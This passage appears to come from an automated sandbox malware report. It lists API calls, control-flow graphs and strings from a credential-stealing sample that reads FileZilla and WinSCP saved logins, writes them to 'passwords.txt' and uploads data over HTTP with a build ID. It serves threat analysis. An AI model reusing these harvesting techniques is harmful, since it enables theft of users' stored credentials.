                                                                                                                                                                    • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                                    • Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C
                                                                                                                                                                    Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 29 405482-405593 call 4104e7 call 410519 call 404ab6 call 411e5d lstrlenA call 411e5d call 4104e7 * 4 StrCmpCA 48 405595 29->48 49 40559b-4055a1 29->49 48->49 50 4055a3-4055b8 InternetOpenA 49->50 51 4055be-4056ce call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 4105c7 call 410609 call 41058d call 402920 * 3 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 49->51 50->51 52 405e64-405eec call 402920 * 4 call 410519 call 402920 * 3 50->52 51->52 118 4056d4-405712 HttpOpenRequestA 51->118 87 405eee-405f2e call 402920 * 6 call 41d016 52->87 119 405e58-405e5e InternetCloseHandle 118->119 120 405718-40571e 118->120 119->52 121 405720-405736 InternetSetOptionA 120->121 122 40573c-405d77 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 405db5-405dc5 call 411afd 122->309 310 405d79-405db0 call 4104e7 call 402920 * 3 122->310 316 405dcb-405dd0 309->316 317 405f2f 309->317 310->87 318 405e11-405e2e InternetReadFile 316->318 320 405e30-405e43 StrCmpCA 318->320 321 405dd2-405dda 318->321 324 405e45-405e46 ExitProcess 320->324 325 405e4c-405e52 InternetCloseHandle 320->325 321->320 323 405ddc-405e0c call 410609 call 41058d call 402920 321->323 323->318 325->119
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                      • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                      • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                                      • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                                                                                      • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                                                                                      • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                    • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,bb7310eab4245006f125c442da2d1e50,",build_id,00437814,------), ref: 00405C67
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                                                                                    • _memmove.LIBCMT ref: 00405CB4
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                                                                                    • _memmove.LIBCMT ref: 00405CD6
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                                                                                    • _memmove.LIBCMT ref: 00405D05
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                                                                                    • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                                                                                    • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                    • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$bb7310eab4245006f125c442da2d1e50$block$build_id$file_data
                                                                                                                                                                    • API String ID: 2638065154-2126246112
                                                                                                                                                                    • Opcode ID: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                                                                                                    • Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
                                                                                                                                                                    • Opcode Fuzzy Hash: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
                                                                                                                                                                    • Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98
                                                                                                                                                                    Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289stringmemoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                      • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                      • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                      • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                      • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                      • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                    • strtok_s.MSVCRT ref: 0040E77E
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                                                                                                    • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                    • API String ID: 4146028692-935134978
                                                                                                                                                                    • Opcode ID: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
                                                                                                                                                                    • Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
                                                                                                                                                                    • Opcode Fuzzy Hash: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
                                                                                                                                                                    • Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99
                                                                                                                                                                    Function 0040E186 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 0040E1B7
                                                                                                                                                                    • _memset.LIBCMT ref: 0040E1D7
                                                                                                                                                                    • _memset.LIBCMT ref: 0040E1E8
                                                                                                                                                                    • _memset.LIBCMT ref: 0040E1F9
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E276
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E29D
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                                                                                                    • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                    • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                    • API String ID: 463713726-2798830873
                                                                                                                                                                    • Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                                                                    • Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
                                                                                                                                                                    • Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                                                                    • Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5
                                                                                                                                                                    Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466networkstringmemoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 568 405f39-405ffe call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 583 406000 568->583 584 406006-40600c 568->584 583->584 585 406012-40619c call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 584->585 586 4066ff-406727 InternetCloseHandle call 408048 584->586 585->586 662 4061a2-4061dc HttpOpenRequestA 585->662 591 406766-4067ec call 402920 * 4 call 401cde call 402920 call 41d016 586->591 592 406729-406761 call 410549 call 410609 call 41058d call 402920 586->592 592->591 663 4061e2-4061e8 662->663 664 4066f3-4066f9 InternetCloseHandle 662->664 665 406206-406690 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA 663->665 666 4061ea-406200 InternetSetOptionA 663->666 664->586 809 4066d2-4066ea InternetReadFile 665->809 666->665 810 406692-40669a 809->810 811 4066ec-4066ed InternetCloseHandle 809->811 810->811 812 40669c-4066cd call 410609 call 41058d call 402920 810->812 811->664 812->809
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                      • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                      • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                                    • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,bb7310eab4245006f125c442da2d1e50,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                                                                                    • _memmove.LIBCMT ref: 00406639
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                                                                                    • _memmove.LIBCMT ref: 00406662
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                    • String ID: "$"$"$------$------$------$------$bb7310eab4245006f125c442da2d1e50$build_id$mode
                                                                                                                                                                    • API String ID: 3702379033-4256281111
                                                                                                                                                                    • Opcode ID: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                                                                                                    • Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
                                                                                                                                                                    • Opcode Fuzzy Hash: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                                                                                                    • Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8
                                                                                                                                                                    Function 00418643 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
